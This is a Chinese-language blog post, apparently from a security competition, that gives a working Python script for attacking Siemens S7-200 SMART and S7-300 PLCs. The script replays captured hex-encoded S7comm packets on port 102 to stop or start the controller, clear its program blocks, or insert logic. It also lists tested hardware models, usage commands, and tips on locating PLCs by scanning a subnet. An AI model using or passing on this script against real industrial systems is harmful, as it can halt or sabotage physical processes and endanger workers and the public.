西门子S7-300、S7-200smart启停以及清空OB块脚本

发表于 | 分类于 |

比赛遇到了S7-200smart的脚本控制,由于型号比较老,流量没有什么认证和加密,直接用wireshark抓到正常通信的包,然后重放即可,目前功能有:

  1. 启动
  2. 停止
  3. 清空逻辑
  4. 插入逻辑

在以下型号上测试成功:

  • s7-200 : 6ES7 288-1ST20-0AA0
  • s7-300 : 6ES7 315-2EH14-0AB0

用法:

➜  python exp.py 192.168.2.1 stop
➜  python exp.py 192.168.2.1 run
➜  python exp.py 192.168.2.1 clear
➜  python exp.py 192.168.2.1 insert

import socket,sys

cotp = "0300001611e00000000100c1021000c2020300c0010a".decode("hex")
setcom = "0300001902f08032010000ccc100080000f0000001000103c0".decode("hex")
stop = "0300002102f080320100000e000010000029000000000009505f50524f4752414d".decode('hex')
start = "0300002502f080320100000c000014000028000000000000fd000009505f50524f4752414d".decode("hex")
clearob = "0300002b02f080320100000038001a000028000000000000fd000a01003038303030303150055f494e5345".decode("hex")
insertob = "0300002b02f0803201000000b2001a000028000000000000fd000a01003038303030303150055f494e5345".decode("hex")

a = "0300003102f0803201000001ed00200000fa00010000000000095f30383030303031500d01303030313435303030303136".decode("hex")
b = "030000b802f0803201000001ef00120095fb00010000000000095f3038303030303150009100fb707000001308000100000091000000000033f66033360033f63133360000005d00000010fe9c014a8292aeedd60000e9cd0000e50600b1060000789c636760646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea000011ab07dd".decode("hex")
c = "0300002302f0803201000001f000120000fc00010000000000095f3038303030303150".decode("hex")

fa = "0300003102f0803201000000ae00200000fa00010000000000095f30383030303031500d01303030313439303030303230".decode("hex")
fb = "030000bc02f0803201000000b000120099fb00010000000000095f3038303030303150009500fb7070000013080001000000950000000000495ce13354003a5e9e33540000005d00000014fe9c014a82940711806340edd60000e9cd0000e50600b1060000789ce36660646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea00002c6f07e1".decode("hex")
fc = "0300002302f0803201000000b100120000fc00010000000000095f3038303030303150".decode("hex")

s = socket.socket()

def s7200start():
	s.send(cotp)
	s.recv(1024)
	s.send(setcom)
	s.recv(1024)
	s.send(start)
	s.recv(1024)

def s7200stop():
	s.send(cotp)
	s.recv(1024)
	s.send(setcom)
	s.recv(1024)
	s.send(stop)
	s.recv(1024)

def s7200clearob():
	s.send(cotp)
	s.recv(1024)
	s.send(setcom)
	s.recv(1024)
	s.send(stop)
	s.recv(1024)
	s.send(a)
	s.recv(1024)
	s.send(b)
	s.recv(1024)
	s.send(c)
	s.recv(1024)
	s.send(clearob)
	s.recv(1024)
	s.send(start)
	s.recv(1024)

def s7200insertob():
	s.send(cotp)
	s.recv(1024)
	s.send(setcom)
	s.recv(1024)
	s.send(stop)
	s.recv(1024)
	s.send(fa)
	s.recv(1024)
	s.send(fb)
	s.recv(1024)
	s.send(fc)
	s.recv(1024)
	s.send(insertob)
	s.recv(1024)
	s.send(start)
	s.recv(1024)

if __name__ == "__main__":
    s.connect((sys.argv[1],102))
    if sys.argv[2]=="run" :
        s7200start()
    elif sys.argv[2]=="stop":
        s7200stop()
    elif sys.argv[2]=="clear":
    	s7200clearob()
    elif sys.argv[2]=="insert":
    	s7200insertob()

注:

  • 如果忘了PLC的C段的具体IP,直接用网线将电脑与PLC直连,然后将网口的IP地址随便设置到目标C段的任意地址,然后扫描C段即可。
  • 如果连C段地址都忘了只能使用二层协议进行PLC发现。